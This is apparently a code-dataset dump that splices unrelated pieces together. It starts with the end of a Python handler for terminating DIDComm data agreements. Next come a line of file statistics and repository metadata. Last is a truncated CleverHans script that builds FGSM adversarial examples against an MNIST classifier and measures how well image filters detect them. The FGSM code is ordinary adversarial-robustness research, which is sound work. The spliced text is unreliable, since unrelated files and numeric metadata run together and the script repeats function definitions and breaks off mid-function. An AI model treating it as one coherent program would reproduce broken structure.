if data_agreement_instance.principle_did != data_agreement_termination_terminate_message_body.proof.verification_method:
self._logger.info(
"Data agreement principle DID does not match sender DID; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
# Send problem report.
problem_report = DataAgreementTerminationProblemReport(
from_did=data_agreement_termination_terminate_message.to_did,
to_did=data_agreement_termination_terminate_message.from_did,
created_time=str(
int(datetime.datetime.utcnow().timestamp())),
problem_code=DataAgreementTerminationProblemReportReason.PRINCIPLE_DID_INVALID.value,
explain=f"Data agreement principle DID does not match sender DID; Failed to process terminate message for data agreement: {data_agreement_termination_terminate_message.body.data_agreement_id}",
data_agreement_id=data_agreement_termination_terminate_message_body.data_agreement_id
)
problem_report.assign_thread_id(
thid=data_agreement_termination_terminate_message._id
)
# Update presentation exchange record with data agreement metadata
pres_ex_record.data_agreement_problem_report = problem_report.serialize()
pres_ex_record.data_agreement_status = V10PresentationExchange.DATA_AGREEMENT_PROBLEM_REPORT
await pres_ex_record.save(context)
await responder.send_reply(problem_report)
return
# Update data agreement event with terminate event
data_agreement_instance.event.append(
data_agreement_termination_terminate_message_body.event
)
# Update data agreement proof chain with terminate proof
data_agreement_instance.proof_chain.append(
data_agreement_termination_terminate_message_body.proof
)
# Verify signatures on data agreement
verkeys = []
for event in data_agreement_instance.event:
temp_verkey = DIDMyData.from_did(event.did).public_key_b58
verkeys.append(temp_verkey)
valid = await verify_data_agreement(
data_agreement_instance.serialize(),
verkeys[-1],
wallet,
drop_proof_chain=False
)
if not valid:
self._logger.error(
"Data agreement terminate verification failed"
)
# Send problem report
problem_report = DataAgreementTerminationProblemReport(
from_did=data_agreement_termination_terminate_message.to_did,
to_did=data_agreement_termination_terminate_message.from_did,
created_time=str(
int(datetime.datetime.utcnow().timestamp())),
problem_code=DataAgreementTerminationProblemReportReason.SIGNATURE_VERIFICATION_FAILED.value,
explain=f"Data agreement terminate verification failed; Failed to process terminate message for data agreement: {data_agreement_termination_terminate_message.body.data_agreement_id}",
data_agreement_id=data_agreement_termination_terminate_message_body.data_agreement_id
)
problem_report.assign_thread_id(
thid=data_agreement_termination_terminate_message._id
)
# Update presentation exchange record with data agreement metadata
pres_ex_record.data_agreement_problem_report = problem_report.serialize()
pres_ex_record.data_agreement_status = V10PresentationExchange.DATA_AGREEMENT_PROBLEM_REPORT
await pres_ex_record.save(context)
await responder.send_reply(problem_report)
raise HandlerException(
"Data agreement terminate signature verification failed"
)
# Update presentation exchange record with data agreement metadata
pres_ex_record.data_agreement = data_agreement_instance.serialize()
pres_ex_record.data_agreement_status = V10PresentationExchange.DATA_AGREEMENT_TERMINATE
await pres_ex_record.save(context)
# Construct terminate ack message
data_agreement_terminate_ack = DataAgreementTerminationAck(
status="TERMINATE OK"
)
data_agreement_terminate_ack.assign_thread_id(
thid=data_agreement_termination_terminate_message._id
)
await responder.send_reply(data_agreement_terminate_ack)
| 46.98153 | 213 | 0.668707 | 1,741 | 17,806 | 6.492246 | 0.106261 | 0.212775 | 0.104043 | 0.131381 | 0.818986 | 0.788021 | 0.771742 | 0.756879 | 0.744404 | 0.726975 | 0 | 0.004396 | 0.284567 | 17,806 | 378 | 214 | 47.10582 | 0.882879 | 0.092609 | 0 | 0.590734 | 0 | 0.023166 | 0.135445 | 0.0222 | 0 | 0 | 0 | 0 | 0.003861 | 1 | 0 | false | 0 | 0.065637 | 0 | 0.111969 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e1f6ff0d37fd00012690d6e8573b4fc32a3219b3 | 35,479 | py | Python | DeepDetector-master/Train/Train_FGSM_MNIST.py | JohnZhang000/adaptive-jpeg-compression | f54e4798c01169812958f4d5539a03927dbdc313 | [
"MIT"
] | null | null | null | DeepDetector-master/Train/Train_FGSM_MNIST.py | JohnZhang000/adaptive-jpeg-compression | f54e4798c01169812958f4d5539a03927dbdc313 | [
"MIT"
] | null | null | null | DeepDetector-master/Train/Train_FGSM_MNIST.py | JohnZhang000/adaptive-jpeg-compression | f54e4798c01169812958f4d5539a03927dbdc313 | [
"MIT"
] | null | null | null |
# coding: utf-8
# In[1]:
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import keras
from keras import backend
import tensorflow as tf
from tensorflow.python.platform import flags
from cleverhans.utils_mnist import data_mnist
from cleverhans.utils_tf import model_train, model_eval, model_argmax
from cleverhans.attacks import FastGradientMethod
from cleverhans.utils import AccuracyReport
from cleverhans.utils_keras import cnn_model
from cleverhans.utils_keras import KerasModelWrapper
import time
import matplotlib.pyplot as plt
import math
FLAGS = flags.FLAGS
# In[2]:
def normalization(image_data):
"""Clip pixel values into the valid [0, 1] range, in place."""
image_data[image_data < 0] = 0
image_data[image_data > 1.0] = 1.0
def boxMeanFilterOperations(inputDigit, start, end, coefficient):
retDigit = np.array(inputDigit, dtype=np.float32)
for row in range(start, end):
for col in range(start, end):
retDigit[row][col] = sum(sum(inputDigit[row-start:row+start+1, col-start:col+start+1])) / coefficient
return retDigit
def diamondAndCrossFilterOperations(inputDigit, kernel, start, end, coefficient):
retDigit = np.array(inputDigit, dtype=np.float32)
for row in range(start, end):
for col in range(start, end):
retDigit[row][col] = sum(sum(inputDigit[row-start:row+start+1, col-start:col+start+1] * kernel)) / coefficient
return retDigit
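# Illustrative sketch (not part of the original script): the box-mean filter
# above replaces each interior pixel with the mean of its neighbourhood. For a
# 3x3 kernel (start=1, coefficient=9) on a made-up 4x4 patch, pixel (1, 1)
# becomes the mean of the top-left 3x3 block of values.
_demo_patch = [[r * 4 + c for c in range(4)] for r in range(4)]
_demo_mean = sum(_demo_patch[r][c] for r in range(3) for c in range(3)) / 9.0
# (0+1+2+4+5+6+8+9+10) / 9 = 45 / 9 = 5.0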
def scalarQuantization(inputDigit, interval, left=True):
"""Quantize pixels in [0, 1] onto a 0-255 grid with the given bin width; left=True snaps to the left bin edge, otherwise to the bin centre."""
retDigit = inputDigit*255
retDigit//=interval
retDigit*=interval
if not left:
halfInterval = interval//2
retDigit+=(halfInterval)
retDigit/=255.0
return retDigit
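# Illustrative sketch (not part of the original script) of the arithmetic in
# scalarQuantization: a pixel in [0, 1] is scaled to 0-255, floored to the left
# edge of its bin of width `interval`, then rescaled. The sample pixel value
# below is made up; with interval 128, 0.6*255 ~ 153 falls in bin 1 -> 128/255.
_demo_pixel = 0.6
_demo_quantized = ((_demo_pixel * 255) // 128) * 128 / 255.0
# _demo_quantized ~ 0.502, i.e. 128/255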
# In[3]:
# Train/evaluate with left scalar quantization for 2-10 quantization levels
def mnist_tutorial(train_start=0, train_end=60000, test_start=0,
test_end=10000, nb_epochs=6, batch_size=128,
learning_rate=0.001, train_dir="/tmp",
filename="mnist.ckpt", load_model=False,
testing=False):
keras.layers.core.K.set_learning_phase(0)
report = AccuracyReport()
tf.set_random_seed(1234)
if not hasattr(backend, "tf"):
raise RuntimeError("This tutorial requires keras to be configured"
" to use the TensorFlow backend.")
if keras.backend.image_dim_ordering() != 'tf':
keras.backend.set_image_dim_ordering('tf')
print("INFO: '~/.keras/keras.json' sets 'image_dim_ordering' to "
"'th', temporarily setting to 'tf'")
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
keras.backend.set_session(sess)
# Get MNIST test data
X_train, Y_train, X_test, Y_test = data_mnist(train_start=train_start,
train_end=train_end,
test_start=test_start,
test_end=test_end)
# Use label smoothing
assert Y_train.shape[1] == 10
label_smooth = .1
Y_train = Y_train.clip(label_smooth / 9., 1. - label_smooth)
# Define input TF placeholder
x = tf.placeholder(tf.float32, shape=(None, 28, 28, 1))
y = tf.placeholder(tf.float32, shape=(None, 10))
# Define TF model graph
model = cnn_model()
predictions = model(x)
print("Defined TensorFlow model graph.")
def evaluate():
# Evaluate the accuracy of the MNIST model on legitimate test examples
eval_params = {'batch_size': batch_size}
acc = model_eval(sess, x, y, predictions, X_test, Y_test, args=eval_params)
report.clean_train_clean_eval = acc
assert X_test.shape[0] == test_end - test_start, X_test.shape
print('Test accuracy on legitimate examples: %0.4f' % acc)
train_params = {
'nb_epochs': nb_epochs,
'batch_size': batch_size,
'learning_rate': learning_rate,
'train_dir': train_dir,
'filename': filename
}
# Train an MNIST model
ckpt = tf.train.get_checkpoint_state(train_dir)
ckpt_path = False if ckpt is None else ckpt.model_checkpoint_path
rng = np.random.RandomState([2017, 8, 30])
if load_model and ckpt_path:
saver = tf.train.Saver()
saver.restore(sess, ckpt_path)
print("Model loaded from: {}".format(ckpt_path))
else:
print("Model was not loaded, training from scratch.")
model_train(sess, x, y, predictions, X_train, Y_train, evaluate=evaluate,
args=train_params, save=True, rng=rng)
# Initialize the Fast Gradient Sign Method (FGSM) attack object and graph
wrap = KerasModelWrapper(model)
advGenTimeStart = time.time()
fgsm = FastGradientMethod(wrap, sess=sess)
fgsm_params = {'eps': 0.2,
'clip_min': 0.,
'clip_max': 1.}
adv_x = fgsm.generate(x, **fgsm_params)
adv_x = sess.run(adv_x, feed_dict={x: X_test[:4500]})
advGenTimeEnd = time.time()
advGenTime = advGenTimeEnd-advGenTimeStart
for i in range(4500):
normalization(adv_x[i:(i+1)])
print('adversarial examples generation time = ', advGenTime, 'seconds')
intervals = [128,85,64,51,43,37,32,28,26]
for intervalIndex in range(9):
startTime = time.time()
print('NBinterval = ', intervalIndex+2, '; interval size = ', intervals[intervalIndex])
original_classified_wrong_number = 0
disturbed_failure_number = 0
test_number = 0
TTP = 0
TP = 0
FN = 0
FP = 0
for i in range(1000):
current_class = int(np.argmax(Y_test[i]))
currentXLabel = model_argmax(sess,x,predictions,X_test[i:(i+1)])
if currentXLabel != current_class:
original_classified_wrong_number+=1
continue
currentAdvXLabel = model_argmax(sess,x,predictions,adv_x[i:(i+1)])
if currentAdvXLabel == currentXLabel:
disturbed_failure_number+=1
continue
test_number+=1
currentX = np.reshape(X_test[i:(i+1)], (28,28))
currentX = scalarQuantization(currentX, intervals[intervalIndex])
currentX = np.reshape(currentX, X_test[i:(i+1)].shape)
currentXFilteredLabel = model_argmax(sess,x,predictions,currentX)
currentAdvX = np.reshape(adv_x[i:(i+1)], (28,28))
currentAdvX = scalarQuantization(currentAdvX, intervals[intervalIndex])
currentAdvX = np.reshape(currentAdvX, X_test[i:(i+1)].shape)
currentAdvXFilteredLabel = model_argmax(sess,x,predictions,currentAdvX)
if currentAdvXFilteredLabel != currentAdvXLabel:
TP+=1
if currentAdvXFilteredLabel == current_class:
TTP+=1
else:
FN+=1
if currentXFilteredLabel != currentXLabel:
FP+=1
if (i+1) % 1000 == 0:
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
endTime = time.time()
print('lasting ', endTime-startTime, 'seconds')
Recall = TP/(TP+FN)
Precision = TP/(TP+FP)
tempStarStr = '********************************************************'
recallStr = 'Recall = %.4f' % (Recall)
precisionStr = 'Precision = %.4f' % (Precision)
print(tempStarStr)
print(recallStr)
print(precisionStr)
print(tempStarStr)
return report
def main(argv=None):
mnist_tutorial(nb_epochs=FLAGS.nb_epochs,
batch_size=FLAGS.batch_size,
learning_rate=FLAGS.learning_rate,
train_dir=FLAGS.train_dir,
filename=FLAGS.filename,
load_model=FLAGS.load_model)
if __name__ == '__main__':
flags.DEFINE_integer('nb_epochs', 6, 'Number of epochs to train model')
flags.DEFINE_integer('batch_size', 128, 'Size of training batches')
flags.DEFINE_float('learning_rate', 0.001, 'Learning rate for training')
flags.DEFINE_string('train_dir', '/tmp', 'Directory where to save model.')
flags.DEFINE_string('filename', 'mnist.ckpt', 'Checkpoint filename.')
flags.DEFINE_boolean('load_model', True, 'Load saved model or train.')
tf.app.run()
# In[3]:
# Train/evaluate with box filters of size 3, 5, 7, 9
def mnist_tutorial(train_start=0, train_end=60000, test_start=0,
test_end=10000, nb_epochs=6, batch_size=128,
learning_rate=0.001, train_dir="/tmp",
filename="mnist.ckpt", load_model=False,
testing=False):
"""
MNIST CleverHans tutorial
:param train_start: index of first training set example
:param train_end: index of last training set example
:param test_start: index of first test set example
:param test_end: index of last test set example
:param nb_epochs: number of epochs to train model
:param batch_size: size of training batches
:param learning_rate: learning rate for training
:param train_dir: Directory storing the saved model
:param filename: Filename to save model under
:param load_model: True for load, False for not load
:param testing: if true, test error is calculated
:return: an AccuracyReport object
"""
keras.layers.core.K.set_learning_phase(0)
# Object used to keep track of (and return) key accuracies
report = AccuracyReport()
# Set TF random seed to improve reproducibility
tf.set_random_seed(1234)
if not hasattr(backend, "tf"):
raise RuntimeError("This tutorial requires keras to be configured"
" to use the TensorFlow backend.")
if keras.backend.image_dim_ordering() != 'tf':
keras.backend.set_image_dim_ordering('tf')
print("INFO: '~/.keras/keras.json' sets 'image_dim_ordering' to "
"'th', temporarily setting to 'tf'")
# Create TF session and set as Keras backend session
# gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.1)
# config = tf.ConfigProto(gpu_options=gpu_options)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
keras.backend.set_session(sess)
# Get MNIST training and test data
X_train, Y_train, X_test, Y_test = data_mnist(train_start=train_start,
train_end=train_end,
test_start=test_start,
test_end=test_end)
# Use label smoothing
assert Y_train.shape[1] == 10
label_smooth = .1
Y_train = Y_train.clip(label_smooth / 9., 1. - label_smooth)
# Define input TF placeholder
x = tf.placeholder(tf.float32, shape=(None, 28, 28, 1))
y = tf.placeholder(tf.float32, shape=(None, 10))
# Define TF model graph
model = cnn_model()
predictions = model(x)
print("Defined TensorFlow model graph.")
def evaluate():
# Evaluate the accuracy of the MNIST model on legitimate test examples
eval_params = {'batch_size': batch_size}
acc = model_eval(sess, x, y, predictions, X_test, Y_test, args=eval_params)
report.clean_train_clean_eval = acc
assert X_test.shape[0] == test_end - test_start, X_test.shape
print('Test accuracy on legitimate examples: %0.4f' % acc)
train_params = {
'nb_epochs': nb_epochs,
'batch_size': batch_size,
'learning_rate': learning_rate,
'train_dir': train_dir,
'filename': filename
}
# Train an MNIST model
ckpt = tf.train.get_checkpoint_state(train_dir)
ckpt_path = False if ckpt is None else ckpt.model_checkpoint_path
rng = np.random.RandomState([2017, 8, 30])
if load_model and ckpt_path:
saver = tf.train.Saver()
saver.restore(sess, ckpt_path)
print("Model loaded from: {}".format(ckpt_path))
else:
print("Model was not loaded, training from scratch.")
model_train(sess, x, y, predictions, X_train, Y_train, evaluate=evaluate,
args=train_params, save=True, rng=rng)
# Initialize the Fast Gradient Sign Method (FGSM) attack object and graph
wrap = KerasModelWrapper(model)
advGenTimeStart = time.time()
fgsm = FastGradientMethod(wrap, sess=sess)
fgsm_params = {'eps': 0.2,
'clip_min': 0.,
'clip_max': 1.}
adv_x = fgsm.generate(x, **fgsm_params)
adv_x = sess.run(adv_x, feed_dict={x: X_test[:4500]})
advGenTimeEnd = time.time()
advGenTime = advGenTimeEnd-advGenTimeStart
for i in range(4500):  # range, not xrange: this code otherwise uses Python 3 syntax
normalization(adv_x[i:(i+1)])
print('adversarial examples generation time = ', advGenTime, 'seconds')
#box filter test, kernel size: 3, 5, 7, 9
for kernelSize in range(3, 10, 2):
startTime = time.time()
print('box filter, size = ', kernelSize)
original_classified_wrong_number = 0
disturbed_failure_number = 0
test_number = 0
TTP = 0
TP = 0
FN = 0
FP = 0
start = (kernelSize-1)//2
end = 28-start
coefficient = kernelSize**2
for i in range(4500):
current_class = int(np.argmax(Y_test[i]))
currentXLabel = model_argmax(sess,x,predictions,X_test[i:(i+1)])
if currentXLabel != current_class:
original_classified_wrong_number+=1
continue
currentAdvXLabel = model_argmax(sess,x,predictions,adv_x[i:(i+1)])
if currentAdvXLabel == currentXLabel:
disturbed_failure_number+=1
continue
test_number+=1
currentX = np.reshape(X_test[i:(i+1)], (28,28))
currentX = boxMeanFilterOperations(currentX, start, end, coefficient)
currentX = np.reshape(currentX, X_test[i:(i+1)].shape)
currentXFilteredLabel = model_argmax(sess,x,predictions,currentX)
currentAdvX = np.reshape(adv_x[i:(i+1)], (28,28))
currentAdvX = boxMeanFilterOperations(currentAdvX, start, end, coefficient)
currentAdvX = np.reshape(currentAdvX, X_test[i:(i+1)].shape)
currentAdvXFilteredLabel = model_argmax(sess,x,predictions,currentAdvX)
if currentAdvXFilteredLabel != currentAdvXLabel:
TP+=1
if currentAdvXFilteredLabel == current_class:
TTP+=1
else:
FN+=1
if currentXFilteredLabel != currentXLabel:
FP+=1
if (i+1) % 1000 == 0:
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
endTime = time.time()
print('lasting ', endTime-startTime, 'seconds')
Recall = TP / (TP + FN) if (TP + FN) else 0.0
Precision = TP / (TP + FP) if (TP + FP) else 0.0
tempStarStr = '********************************************************'
recallStr = 'Recall = %.4f' % (Recall)
precisionStr = 'Precision = %.4f' % (Precision)
print(tempStarStr)
print(recallStr)
print(precisionStr)
print(tempStarStr)
return report
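# The label-smoothing step above maps one-hot targets {0, 1} to
# {label_smooth/9, 1 - label_smooth}, so every row still sums to 1.
# A quick numeric check of that arithmetic:

```python
import numpy as np

label_smooth = 0.1
Y = np.eye(10)[[3, 7]]  # two one-hot MNIST labels
# Same clip call as in the tutorial: floor at eps/9, cap at 1 - eps
Y_smooth = Y.clip(label_smooth / 9.0, 1.0 - label_smooth)
```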
def main(argv=None):
mnist_tutorial(nb_epochs=FLAGS.nb_epochs,
batch_size=FLAGS.batch_size,
learning_rate=FLAGS.learning_rate,
train_dir=FLAGS.train_dir,
filename=FLAGS.filename,
load_model=FLAGS.load_model)
if __name__ == '__main__':
flags.DEFINE_integer('nb_epochs', 6, 'Number of epochs to train model')
flags.DEFINE_integer('batch_size', 128, 'Size of training batches')
flags.DEFINE_float('learning_rate', 0.001, 'Learning rate for training')
flags.DEFINE_string('train_dir', '/tmp', 'Directory where to save model.')
flags.DEFINE_string('filename', 'mnist.ckpt', 'Checkpoint filename.')
flags.DEFINE_boolean('load_model', True, 'Load saved model or train.')
tf.app.run()
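# The diamond and cross cells below call diamondAndCrossFilterOperations,
# which is not defined in this excerpt. A minimal sketch, assuming it
# averages only the pixels selected by a 0/1 mask, with coefficient equal
# to the number of ones in the mask:

```python
import numpy as np

def masked_mean_filter(img, kernel, start, end, coefficient):
    """Hypothetical stand-in for diamondAndCrossFilterOperations: mean over
    the pixels selected by a 0/1 kernel mask (diamond- or cross-shaped)."""
    out = img.copy()
    for r in range(start, end):
        for c in range(start, end):
            window = img[r - start:r + start + 1, c - start:c + start + 1]
            out[r, c] = (window * kernel).sum() / coefficient
    return out
```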
# In[3]:
#Diamond filter test: train (or load) the model, then evaluate diamond filters of size 3, 5, 7, 9
def mnist_tutorial(train_start=0, train_end=60000, test_start=0,
test_end=10000, nb_epochs=6, batch_size=128,
learning_rate=0.001, train_dir="/tmp",
filename="mnist.ckpt", load_model=False,
testing=False):
"""
MNIST CleverHans tutorial
:param train_start: index of first training set example
:param train_end: index of last training set example
:param test_start: index of first test set example
:param test_end: index of last test set example
:param nb_epochs: number of epochs to train model
:param batch_size: size of training batches
:param learning_rate: learning rate for training
:param train_dir: Directory storing the saved model
:param filename: Filename to save model under
:param load_model: True to load a saved model, False to train from scratch
:param testing: if true, test error is calculated
:return: an AccuracyReport object
"""
keras.layers.core.K.set_learning_phase(0)
# Object used to keep track of (and return) key accuracies
report = AccuracyReport()
# Set TF random seed to improve reproducibility
tf.set_random_seed(1234)
if not hasattr(backend, "tf"):
raise RuntimeError("This tutorial requires keras to be configured"
" to use the TensorFlow backend.")
if keras.backend.image_dim_ordering() != 'tf':
keras.backend.set_image_dim_ordering('tf')
print("INFO: '~/.keras/keras.json' sets 'image_dim_ordering' to "
"'th', temporarily setting to 'tf'")
# Create TF session and set as Keras backend session
# gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.1)
# config = tf.ConfigProto(gpu_options=gpu_options)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
keras.backend.set_session(sess)
# Get MNIST training and test data
X_train, Y_train, X_test, Y_test = data_mnist(train_start=train_start,
train_end=train_end,
test_start=test_start,
test_end=test_end)
# Use label smoothing
assert Y_train.shape[1] == 10
label_smooth = .1
Y_train = Y_train.clip(label_smooth / 9., 1. - label_smooth)
# Define input TF placeholder
x = tf.placeholder(tf.float32, shape=(None, 28, 28, 1))
y = tf.placeholder(tf.float32, shape=(None, 10))
# Define TF model graph
model = cnn_model()
predictions = model(x)
print("Defined TensorFlow model graph.")
def evaluate():
# Evaluate the accuracy of the MNIST model on legitimate test examples
eval_params = {'batch_size': batch_size}
acc = model_eval(sess, x, y, predictions, X_test, Y_test, args=eval_params)
report.clean_train_clean_eval = acc
assert X_test.shape[0] == test_end - test_start, X_test.shape
print('Test accuracy on legitimate examples: %0.4f' % acc)
train_params = {
'nb_epochs': nb_epochs,
'batch_size': batch_size,
'learning_rate': learning_rate,
'train_dir': train_dir,
'filename': filename
}
# Train an MNIST model
ckpt = tf.train.get_checkpoint_state(train_dir)
ckpt_path = False if ckpt is None else ckpt.model_checkpoint_path
rng = np.random.RandomState([2017, 8, 30])
if load_model and ckpt_path:
saver = tf.train.Saver()
saver.restore(sess, ckpt_path)
print("Model loaded from: {}".format(ckpt_path))
else:
print("Model was not loaded, training from scratch.")
model_train(sess, x, y, predictions, X_train, Y_train, evaluate=evaluate,
args=train_params, save=True, rng=rng)
# Initialize the Fast Gradient Sign Method (FGSM) attack object and graph
wrap = KerasModelWrapper(model)
advGenTimeStart = time.time()
fgsm = FastGradientMethod(wrap, sess=sess)
fgsm_params = {'eps': 0.2,
'clip_min': 0.,
'clip_max': 1.}
adv_x = fgsm.generate(x, **fgsm_params)
adv_x = sess.run(adv_x, feed_dict={x: X_test[:4500]})
advGenTimeEnd = time.time()
advGenTime = advGenTimeEnd-advGenTimeStart
for i in range(4500):
normalization(adv_x[i:(i+1)])
print('adversarial examples generation time = ', advGenTime, 'seconds')
diamonds = [np.array([[0,1,0],[1,1,1],[0,1,0]]),
np.array([[0,0,1,0,0],
[0,1,1,1,0],
[1,1,1,1,1],
[0,1,1,1,0],
[0,0,1,0,0]]),
np.array([[0,0,0,1,0,0,0],
[0,0,1,1,1,0,0],
[0,1,1,1,1,1,0],
[1,1,1,1,1,1,1],
[0,1,1,1,1,1,0],
[0,0,1,1,1,0,0],
[0,0,0,1,0,0,0]]),
np.array([[0,0,0,0,1,0,0,0,0],
[0,0,0,1,1,1,0,0,0],
[0,0,1,1,1,1,1,0,0],
[0,1,1,1,1,1,1,1,0],
[1,1,1,1,1,1,1,1,1],
[0,1,1,1,1,1,1,1,0],
[0,0,1,1,1,1,1,0,0],
[0,0,0,1,1,1,0,0,0],
[0,0,0,0,1,0,0,0,0],])]
coefficient = [5,13, 25, 41]
#diamond filter test, kernel size: 3, 5, 7, 9
kernelIndex = -1
for kernelSize in range(3, 10, 2):
startTime = time.time()
original_classified_wrong_number = 0
disturbed_failure_number = 0
test_number = 0
TTP = 0
TP = 0
FN = 0
FP = 0
start = (kernelSize-1)//2
end = 28-start
kernelIndex+=1
print('diamond filter')
print(diamonds[kernelIndex])
for i in range(4500):
current_class = int(np.argmax(Y_test[i]))
currentXLabel = model_argmax(sess,x,predictions,X_test[i:(i+1)])
if currentXLabel != current_class:
original_classified_wrong_number+=1
continue
currentAdvXLabel = model_argmax(sess,x,predictions,adv_x[i:(i+1)])
if currentAdvXLabel == currentXLabel:
disturbed_failure_number+=1
continue
test_number+=1
currentX = np.reshape(X_test[i:(i+1)], (28,28))
currentX = diamondAndCrossFilterOperations(currentX, diamonds[kernelIndex], start, end, coefficient[kernelIndex])
currentX = np.reshape(currentX, X_test[i:(i+1)].shape)
currentXFilteredLabel = model_argmax(sess,x,predictions,currentX)
currentAdvX = np.reshape(adv_x[i:(i+1)], (28,28))
currentAdvX = diamondAndCrossFilterOperations(currentAdvX, diamonds[kernelIndex], start, end, coefficient[kernelIndex])
currentAdvX = np.reshape(currentAdvX, X_test[i:(i+1)].shape)
currentAdvXFilteredLabel = model_argmax(sess,x,predictions,currentAdvX)
if currentAdvXFilteredLabel != currentAdvXLabel:
TP+=1
if currentAdvXFilteredLabel == current_class:
TTP+=1
else:
FN+=1
if currentXFilteredLabel != currentXLabel:
FP+=1
if (i+1) % 1000 == 0:
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
endTime = time.time()
print('lasting ', endTime-startTime, 'seconds')
Recall = TP / (TP + FN) if (TP + FN) else 0.0
Precision = TP / (TP + FP) if (TP + FP) else 0.0
tempStarStr = '********************************************************'
recallStr = 'Recall = %.4f' % (Recall)
precisionStr = 'Precision = %.4f' % (Precision)
print(tempStarStr)
print(recallStr)
print(precisionStr)
print(tempStarStr)
return report
def main(argv=None):
mnist_tutorial(nb_epochs=FLAGS.nb_epochs,
batch_size=FLAGS.batch_size,
learning_rate=FLAGS.learning_rate,
train_dir=FLAGS.train_dir,
filename=FLAGS.filename,
load_model=FLAGS.load_model)
if __name__ == '__main__':
flags.DEFINE_integer('nb_epochs', 6, 'Number of epochs to train model')
flags.DEFINE_integer('batch_size', 128, 'Size of training batches')
flags.DEFINE_float('learning_rate', 0.001, 'Learning rate for training')
flags.DEFINE_string('train_dir', '/tmp', 'Directory where to save model.')
flags.DEFINE_string('filename', 'mnist.ckpt', 'Checkpoint filename.')
flags.DEFINE_boolean('load_model', True, 'Load saved model or train.')
tf.app.run()
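# Each test loop prints TP/FN/FP counters and ends with the Recall and
# Precision lines. The arithmetic, with guards for empty denominators
# (the numbers here are illustrative, not from the experiments):

```python
def detection_metrics(TP, FN, FP):
    # Recall: share of adversarial inputs whose label changed after filtering.
    # Precision: share of label changes that really were adversarial inputs.
    recall = TP / (TP + FN) if (TP + FN) else 0.0
    precision = TP / (TP + FP) if (TP + FP) else 0.0
    return recall, precision
```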
# In[3]:
#Cross filter test: train (or load) the model, then evaluate cross filters of size 3, 5, 7, 9
def mnist_tutorial(train_start=0, train_end=60000, test_start=0,
test_end=10000, nb_epochs=6, batch_size=128,
learning_rate=0.001, train_dir="/tmp",
filename="mnist.ckpt", load_model=False,
testing=False):
"""
MNIST CleverHans tutorial
:param train_start: index of first training set example
:param train_end: index of last training set example
:param test_start: index of first test set example
:param test_end: index of last test set example
:param nb_epochs: number of epochs to train model
:param batch_size: size of training batches
:param learning_rate: learning rate for training
:param train_dir: Directory storing the saved model
:param filename: Filename to save model under
:param load_model: True to load a saved model, False to train from scratch
:param testing: if true, test error is calculated
:return: an AccuracyReport object
"""
keras.layers.core.K.set_learning_phase(0)
# Object used to keep track of (and return) key accuracies
report = AccuracyReport()
# Set TF random seed to improve reproducibility
tf.set_random_seed(1234)
if not hasattr(backend, "tf"):
raise RuntimeError("This tutorial requires keras to be configured"
" to use the TensorFlow backend.")
if keras.backend.image_dim_ordering() != 'tf':
keras.backend.set_image_dim_ordering('tf')
print("INFO: '~/.keras/keras.json' sets 'image_dim_ordering' to "
"'th', temporarily setting to 'tf'")
# Create TF session and set as Keras backend session
# gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.1)
# config = tf.ConfigProto(gpu_options=gpu_options)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
keras.backend.set_session(sess)
# Get MNIST training and test data
X_train, Y_train, X_test, Y_test = data_mnist(train_start=train_start,
train_end=train_end,
test_start=test_start,
test_end=test_end)
# Use label smoothing
assert Y_train.shape[1] == 10
label_smooth = .1
Y_train = Y_train.clip(label_smooth / 9., 1. - label_smooth)
# Define input TF placeholder
x = tf.placeholder(tf.float32, shape=(None, 28, 28, 1))
y = tf.placeholder(tf.float32, shape=(None, 10))
# Define TF model graph
model = cnn_model()
predictions = model(x)
print("Defined TensorFlow model graph.")
def evaluate():
# Evaluate the accuracy of the MNIST model on legitimate test examples
eval_params = {'batch_size': batch_size}
acc = model_eval(sess, x, y, predictions, X_test, Y_test, args=eval_params)
report.clean_train_clean_eval = acc
assert X_test.shape[0] == test_end - test_start, X_test.shape
print('Test accuracy on legitimate examples: %0.4f' % acc)
train_params = {
'nb_epochs': nb_epochs,
'batch_size': batch_size,
'learning_rate': learning_rate,
'train_dir': train_dir,
'filename': filename
}
# Train an MNIST model
ckpt = tf.train.get_checkpoint_state(train_dir)
ckpt_path = False if ckpt is None else ckpt.model_checkpoint_path
rng = np.random.RandomState([2017, 8, 30])
if load_model and ckpt_path:
saver = tf.train.Saver()
saver.restore(sess, ckpt_path)
print("Model loaded from: {}".format(ckpt_path))
else:
print("Model was not loaded, training from scratch.")
model_train(sess, x, y, predictions, X_train, Y_train, evaluate=evaluate,
args=train_params, save=True, rng=rng)
# Initialize the Fast Gradient Sign Method (FGSM) attack object and graph
